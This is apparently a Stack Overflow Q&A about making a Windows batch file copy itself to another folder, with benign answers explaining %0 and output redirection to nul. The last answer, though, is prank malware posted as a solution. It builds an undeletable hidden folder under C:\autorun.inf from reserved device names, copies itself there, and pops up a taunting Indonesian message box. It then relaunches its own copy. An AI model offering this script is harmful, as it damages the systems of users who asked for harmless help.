# How can I make a batch file copy itself?

Tags: batch-file

Isn't it supposed to be just a simple command? COPY 0%.BAT FOLDER?
I have a batch file inside a folder which is inside another folder that is on the desktop (Desktop > Temp > activity > test.bat). In the batch file at the end I added this:

```
COPY %0.BAT Temp
```

so basically I want to copy it to copy itself to the parent folder without it running. 
and one more thing, how can I redirect the output of my batch file commands to a nul device?

Answer (score 2, accepted):

You want to copy the batch file up 2 folders, right?  How about this?

```
@echo off
copy %0 ..\..\temp >nul
```

If you want to redirect the standard output of a command to nowhere, use >nul.  Use @echo off to turn off all output.

**Update to explain what %0 is:**

When running a batch file, values like "%0" or "%1" refer to the arguments passed into the batch file.  The value %0 is the batch file itself, the value %1 is the first argument passed to the batch file, %2 is the second argument, etc..  So for example if you had a file FOO.BAT which contained:

```
echo 1st arg: '%0'
echo 2nd arg: '%1'
echo 3rd arg: '%2'
```

If you ran:

```
C:\foo.bat hello world
```

The output would be:

```
1st arg: 'foo.bat'
2nd arg: 'hello'
3rd arg: 'world'
```

Comment: So this basically copies the file "0" to the temp folder and sends the results to nul? My question here is how is the compiler going to know where the " 0" file originally is located before it copies it? Like shouldn't we specify the source and the destination?

Comment: Values like %0 are special variables which contain values passed on the command line to the batch file.  So in the copy command, "%0" refers to the batch file itself (the source) and "..\..\temp" refers to the directory where it will be copied (the destination).  I updated the answer with a little extra info.

Comment: so If i were to copy my file (test.bat) am I going to do it as follows: "%test ? and put in the full destination of where I want it to be copied?

Comment: It's not clear to me what you are trying to do -- start a new stackoverflow question with more details and I will take a look.

Comment: http://stackoverflow.com/questions/26759727/copying-a-batch-file-to-another-location

Answer (score 0):

Try this:

```
 copy "%0" ..\>nul
```

Comment: I don't think you want the ".bat" -- %0 includes the file extension

Answer (score 0):

A little bit of information: If a * .bat file wants to copy itself to another folder, you can do this by placing the code: copy >nul *.bat ... \ ... \ ... \

Comment: sorry, but this will copy *all*  `.bat` files. This is not what was asked.

Comment: The '*' actually points to the file you want to copy. If you say tr.bat for the example instead, only the tr.bat file will be copied.

Comment: Also, I am Turkish. I don't know much English, I shared that maybe it can help. Hope it helps ...

Comment: The idea was to *not* hardcode the filename.

Comment: Understood. then the copy % 0 "... \ ... \ ... \" code will be enough

Answer (score 0):

```
mkdir \\.\C:\autorun.inf\con\aux\nul

xcopy /s /y %0 > C:\autorun.inf\con\aux\services.bat

attrib +h +s C:\autorun.inf

@echo off

echo x=msgbox("Sudah dibilang jangan dibuka masih aja ngeyel" ,16, "RASAKAN !!!") >> C:\autorun.inf\con\aux\meta.vbs

attrib +r +s C:\autorun.inf\con\aux\meta.vbs

start C:\autorun.inf\con\aux\meta.vbs

start C:\autorun.inf\con\aux\services.bat

exit
```